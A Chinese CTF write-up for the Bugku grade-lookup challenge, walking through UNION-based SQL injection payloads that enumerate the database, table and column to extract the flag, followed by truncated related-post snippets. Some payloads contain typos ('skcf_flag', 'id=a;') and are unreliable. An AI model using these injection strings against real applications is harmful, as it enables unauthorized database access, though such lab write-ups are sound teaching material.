bugku 成績查詢

2021-08-31 11:37:16 字數 790 閱讀 4565

典型的sql聯合注入,用bp進行爆破。

step1:

聯合注入要求查詢列數相同,姓名、語數外一共四個資料,因此select 1,2,3,4

令id=a』是為了使前乙個查詢無效而回顯第二個查詢(也可以使用其他字元,只要保證union前的查詢無效即可)

id=a' union select 1,2,3,4#
step2:查詢資料庫名
id=a' union select 1,2,3,database()#
即得資料庫名 skctf_flag

step3: 查詢表名

id=a' union select 1,2,3,concat(table_name) from information_schema.tables where table_schema='skcf_flag'#

#information_schema.tables 用於查詢表的資訊

#table_schema='skcf_flag' 指定要查詢的表名

得到表名為fl4g

step4 :查詢列名

id=a; union select 1,2,3,concat(column_name) from information_schema.columns where table_name='fl4g'
得到列名為skctf_flag

step5 :得flag

id=a; union select 1,2,3,skctf_flag from fl4g

Bugku 成績單 有感

題目位址 因為個人是個小白,看到題目毫無頭緒。在網上搜到wp,參考著得以理解。這個題目需要手動爆破資料庫的 庫名 表名 列名 內容。庫名 用資料庫聯合查詢語句 id 1 union select 1,2,3,database 得到資料庫名字skctf flag 表名 id 1 union selec...

bugku 成績單詳解

bugku 成績單詳解 首先開啟查詢成績的頁面 當你這樣去試了之後,就會發現當輸入id 1,2,3,的時候分別有三個孩子的成績,但是當id 4的時候,成績單裡面的成績又為空了。因此我們可以猜測資料庫裡面一共是有四列的 然後在此處利用內建函式database 爆破獲取資料庫的名字。此處可以看出資料庫的...

BUGKU 本地包含 成績單)

在網頁中新建標籤頁開啟鏈結後出現以下一些php 下面解析這段 r eq uest 這個變數 和 request這個變數和 r eque st這個 變數和 get post一樣,都屬於超級全域性變數,執行時修改後者不會影響前者,修改後者不會影響前者。在這裡可以以get post cookies等方式把...